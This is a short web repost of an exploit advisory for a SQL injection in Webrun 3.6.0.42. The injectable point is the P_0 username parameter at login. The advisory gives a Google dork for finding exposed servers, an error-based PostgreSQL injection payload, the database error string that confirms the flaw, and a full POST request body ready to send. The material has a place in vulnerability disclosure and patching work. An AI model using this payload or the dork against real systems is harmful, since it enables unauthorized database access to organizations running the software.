Exploit/Advisories no image

Published on November 24th, 2021 📆 | 2156 Views ⚑

0

Webrun 3.6.0.42 SQL Injection – Torchsec

# Exploit Title: Webrun 3.6.0.42 – ‘P_0’ SQL Injection
# Google Dork: intitle:”Webrun 3.6.0.42″
# Date: 23/11/2021
# Exploit Author: Vinicius Alves
# Vendor Homepage: https://softwell.com.br/
# Version: 3.6.0.42
# Tested on: Kali Linux 2021.3

=-=-=-= Description =-=-=-=

Webrun version 3.6.0.42 is vulnerable to SQL Injection, applied to the P_0
parameter used to set the username during the login process.

=-=-=-= Exploiting =-=-=-=

In the post request, change the P_0 value to the following payload:
121′)+AND+5110%3dCAST((CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113))||(SELECT+(CASE+WHEN+(5110%3d5110)+THEN+1+ELSE+0+END))%3a%3atext||(CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113))+AS+NUMERIC)+AND+(‘AYkd’%3d’AYkd

You will see some information like below:

interactionError(‘ERRO: sintaxe de entrada é inválida para tipo numeric:
“qvvxq1qbzbq”‘, null, null, null, ‘

=-=-=-= POC =-=-=-=

If the return has the value ‘qvvxq1qbzbq’, you will be able to successfully
exploit this.

See an example of the complete POST parameter:

action=executeRule&pType=2&ruleName=GES_FLX_Gerar+Token+Dashboard&sys=GES&formID=8265&parentRID=-1&P_0=121′)+AND+5110%3dCAST((CHR(113)||CHR(118)||CHR(118)||CHR(120)||CHR(113))||(SELECT+(CASE+WHEN+(5110%3d5110)+THEN+1+ELSE+0+END))%3a%3atext||(CHR(113)||CHR(98)||CHR(122)||CHR(98)||CHR(113))+AS+NUMERIC)+AND+(‘AYkd’%3d’AYkd&P_1=pwd

Source link

Tagged with:



Leave a Reply

Your email address will not be published. Required fields are marked *